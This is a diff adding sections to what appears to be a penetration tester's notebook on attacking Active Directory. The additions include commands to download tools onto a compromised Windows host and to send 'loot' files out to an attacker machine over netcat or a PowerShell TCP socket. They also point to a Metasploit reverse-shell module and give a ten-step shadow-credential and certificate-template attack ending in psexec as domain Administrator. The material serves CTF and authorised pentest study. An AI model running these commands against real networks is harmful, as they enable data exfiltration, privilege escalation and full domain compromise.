--- a/hnetwork_notes.ipynb
+++ b/hnetwork_notes.ipynb
@@ -447,6 +447,7 @@
     "* **[Privileged Access Attacks](#activedirprivaccess)**\n",
     "* **[ASREPRoasting](#activedirasreproasting)**\n",
     "* **[Group Policy Object (GPO) Abuse](#activedirgpoabuse)**\n",
+    "* **[Certificate Services (AD CS) Abuse](#activedircertificateservabuse)**\n",
     "* **[Attacking Domain Trusts](#activedirattackingdomaintrusts)**\n",
     "   * **[Attacking Domain Trusts (Linux)](#activedirattackingdomaintrustslinux)**\n",
     "   * **[Attacking Domain Trusts (Windows)](#activedirattackingdomaintrustswindows)**\n",
@@ -9163,7 +9164,33 @@
     "sudo bloodhound-python -d DOMAIN.controller -u user -p password -ns {Domain Controller IP Address} -c all\n",
     "\n",
     "```\n",
-    "Once all of the files are generated from the previous command, upload the data to bloodhound interactively through the GUI. After the files are uploaded, go to the analysis section and select whatever option necessary."
+    "Once all of the files are generated from the previous command, upload the data to bloodhound interactively through the GUI. After the files are uploaded, go to the analysis section and select whatever option necessary. `SharpHound.exe` can be used to collect data from the compromised machine, then sent over to the attacking machine. This, and other scripts, can be sent to the attacking machine by using wget (cmd; start a server on the attacking machine first, then wget from the Windows) or the following PowerShell command:\n",
+    "```powershell\n",
+    "Invoke-WebRequest -Uri \"http://x.x.x.x/SharpHound.exe\" -OutFile \"SharpHound.exe\"\n",
+    "\n",
+    "```\n",
+    "To do the opposite (send files from a Windows machine to the attacking machine), the method depends on the session type, i.e., PowerShell or CMD. For both methods, a netcat listener must be set up on an ephemeral port on the attacking machine, as follows:\n",
+    "```bash\n",
+    "nc -lvnp xxxx > loot.zip         #change file extension if necessary\n",
+    "\n",
+    "```\n",
+    "Use the following command format for **PowerShell** sessions. Once this is executed, the local machine should have the data written to the specified file\n",
+    "```powershell\n",
+    "$ip = \"x.x.x.x\"\n",
+    "$port = xxxx         #set from attacking machine\n",
+    "$file = \"C:\\Path\\To\\file.zip\"           #change file extension if necessary\n",
+    "$client = New-Object System.Net.Sockets.TcpClient($ip, $port)\n",
+    "$stream = $client.GetStream()\n",
+    "$bytes = [System.IO.File]::ReadAllBytes($file)\n",
+    "$stream.Write($bytes, 0, $bytes.Length)\n",
+    "$stream.Close()\n",
+    "$client.Close()\n",
+    "\n",
+    "```\n",
+    "Use the following command format for a **CMD** prompt session. The Windows machine must have **nc.exe** for this to work; wait a while for the file to upload, then close the session from the attacking machine if it has not closed automatically:\n",
+    "```powershell\n",
+    "type C:\\Path\\To\\file.zip | C:\\Path\\To\\nc.exe x.x.x.x xxxx            #attacking IP followed by port\n",
+    "```"
    ]
   },
   {
@@ -9386,7 +9413,7 @@
     "Get-ADDomain\n",
     "\n",
     "```\n",
-    "The following command uses the` Get-ADUser` cmdlet, and filters for accounts with the ServicePrincipleName properly populated. This will **yield a listing of accounts that may be susceptible to a kerberoasting attack**:\n",
+    "The following command uses the `Get-ADUser` cmdlet, and filters for accounts with the ServicePrincipleName properly populated. This will **yield a listing of accounts that may be susceptible to a kerberoasting attack**:\n",
     "```powershell\n",
     "Get-ADUser -Filter {ServicePrincipalName -ne \"$null\"} -Properties ServicePrincipalName\n",
     "\n",
@@ -10758,12 +10785,12 @@
     "\n",
     "```\n",
     "Commands can be run in the format `xp_cmdshell command`. Rights that the user has on the system can be enumerated; check if the user has the `SeImpersonatePrivilege`, as it can be leveraged in combination with tools such as [JuicyPotato](https://github.com/ohpe/juicy-potato), [PrintSpoofer](https://github.com/itm4n/PrintSpoofer), or [RoguePotato](https://github.com/antonioCoco/RoguePotato) to escalate to SYSTEM level privileges, depending on the target host:\n",
-    "\n",
     "```bash\n",
     "xp_cmdshell whoami /priv\n",
     "\n",
     "xp_cmdshell dir /Users\n",
-    "```"
+    "```\n",
+    "If these commands work, use the `/exploit/windows/mssql/mssql_payload` module on metasploit with the found credentials to get a reverse shell."
    ]
   },
   {
@@ -10862,6 +10889,86 @@
     "If done in BloodHound, check to see what GPO rights the Domain Users group has. This can be done by selecting the GPO in BloodHound, and scrolling down to Affected Objects on the Node Info tab. \n",
     "\n",
     "[SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) can also be used to take advantage of GPO misconfigurations by performing malicious actions, such as adding a compromised user to the local admins group on one of the affected hosts, creating an immediate scheduled task on one of the hosts to get a reverse shell, or by configuring a malicious computer startup script to get a reverse shell. However, be careful when running this tool, as every computer within the OU that the GPO is linked to can be affected."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id=\"activedircertificateservabuse\"></a>\n",
+    "\n",
+    "#### **`Certificate Services (AD CS) Abuse`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "If the compromised user has some form of access (i.e., ACL or credentials) to another user that manages certificates (i.e., Certificate Authority), it can potentially be leveraged to escalate privileges. This access can be enumerated with BloodHound or PowerView. \n",
+    "\n",
+    "If the compromised user has an ACL right over the user that manages certificates, there can be several attack vectors depending on the exact right; all of which can be determined through BloodHound (right-click privilege, press help, check abuse methods). The `WriteOwner` privilege, for example, can enable the (already compromised) user to change the password of the certificate service account, perform a targeted kerberoast, or a shadow credential attack. To change the password of the certificate service account, the more privileged, already compromised user must also have the right to change the password (Set-DomainUserPassword) of the certificate service account. \n",
+    "\n",
+    "<br>\n",
+    "\n",
+    "**<u>Shadow Credential Attack</u>** \n",
+    "\n",
+    "It is necessary to have the credentials of the compromised user to perform this attack (entire NTLM hash or cleartext password). Remove the password positional argument and specify the entire NTLM hash (LM:NT) after the `-hashes` flag\n",
+    "\n",
+    "**1. Change Ownership of Certificate Service Account**\n",
+    "```bash\n",
+    "impacket-owneredit -action write -new-owner 'compromised_user' -target 'cert_user' -dc-ip x.x.x.x 'domain.controller'/'compromised_user':'password'\n",
+    "\n",
+    "```\n",
+    "**2. Change Permissions of Account**\n",
+    "```bash\n",
+    "impacket-dacledit -action write -rights 'FullControl' -principal 'compromised_user' -target 'cert_user' -dc-ip x.x.x.x 'domain.controller'/'compromised_user':'password'\n",
+    "\n",
+    "```\n",
+    "**3. Create Certificate:** [PyWhisker](https://github.com/ShutdownRepo/pywhisker) may require using a virtual environment. This command adds a new KeyCredential to the msDs-KeyCredentialLink:\n",
+    "```bash\n",
+    "python pywhisker.py --dc-ip x.x.x.x -d domain.controller -u compromised_user -p password --target \"cert_user\" --action \"add\" --filename HostCert --export PEM\n",
+    "\n",
+    "```\n",
+    "**4. Export Certificate:** The previous command should have generated a self-signed PEM certificate and key. The specified word after the filename flag, which in this case is HostCert, will have _cert appended to it if it is the certificate and _priv appended to it if it is the key. The following commands use kerberos [PKINIT](https://github.com/dirkjanm/PKINITtools/tree/master) to output a TGT into the specified cache (cert_user.ccache in this case):\n",
+    "```bash\n",
+    "python3 gettgtpkinit.py -dc-ip x.x.x.x -cert-pem HostCert_cert.pem -key-pem HostCert_priv.pem domain.controller/cert_user cert_user.ccache\n",
+    "\n",
+    "export KRB5CCNAME=cert_user.ccache\n",
+    "\n",
+    "```\n",
+    "**5. Get Hash:** The previous command should have output the ASREP encryption key. This value needs to be copied to submit a TGS request for the certificate service account. After running this command, the NT hash of the certificate service account will be output:\n",
+    "```bash\n",
+    "python3 getnthash.py -dc-ip x.x.x.x  domain.controller/cert_user -key <key from previous command output>\n",
+    "\n",
+    "```\n",
+    "**6. Enumerate Vulnerable Certificate Templates:** With the NT hash of the service account, get more information about the certificate services. This could also be enumerated with the compromised user that has some access over the certificate service account (2) to get files for BloodHound. If the first command does not display which templates are vulnerable, manual enumeration must be performed by adding the `-old-bloodhound` flag or there are no vulnerable certificate templates (try to write a new one or find another tactic):\n",
+    "```bash\n",
+    "certipy-ad find -u cert_user -hashes <NT hash> -dc-ip x.x.x.x -target domain.controller -vulnerable \n",
+    "\n",
+    "certipy-ad find -u compromised_user -p password -dc-ip x.x.x.x -target domain.controller -old-bloodhound\n",
+    "\n",
+    "```\n",
+    "Find the exact name of the CA from the previous command and a writable template. This is best done with the `vulnerable` flag or by uploading the ingested data to BloodHound. BloodHound is the best option, as it discloses users in privileged groups that can be compromised in the 8th step.\n",
+    "\n",
+    "**7. Backup Original Certificate Template:** This is not necessary if this is for a CTF, but it is for actual pentests. \n",
+    "```bash\n",
+    "certipy-ad template -u cert_user -hashes <NT hash> -template vulnerable_template_name -dc-ip x.x.x.x -target domain.controller -save-old\n",
+    "\n",
+    "```\n",
+    "**8. Get .pfx File of a Privileged User:** Request the certificate of the default Administrator account first. If this does not work, try other privileged accounts that were previously enumerated:\n",
+    "```bash\n",
+    "certipy-ad req -u cert_user -hashes <NT hash> -dc-ip x.x.x.x -target hostname.domain.controller -ca certificate_authority_name -template vulnerable_template_name -upn administrator@domain.controller -dns domain.controller\n",
+    "\n",
+    "```\n",
+    "**9. Get the NTLM Hash of the Privileged User**\n",
+    "```bash\n",
+    "certipy-ad auth -pfx administrator_domain.pfx -dc-ip x.x.x.x -username administrator -domain domain.controller\n",
+    "\n",
+    "```\n",
+    "**10. Authenticate to the Domain Controller** \n",
+    "```bash\n",
+    "impacket-psexec administrator@x.x.x.x -hashes <NTLM hash of privileged user>\n",
+    "```"
    ]
   },
   {
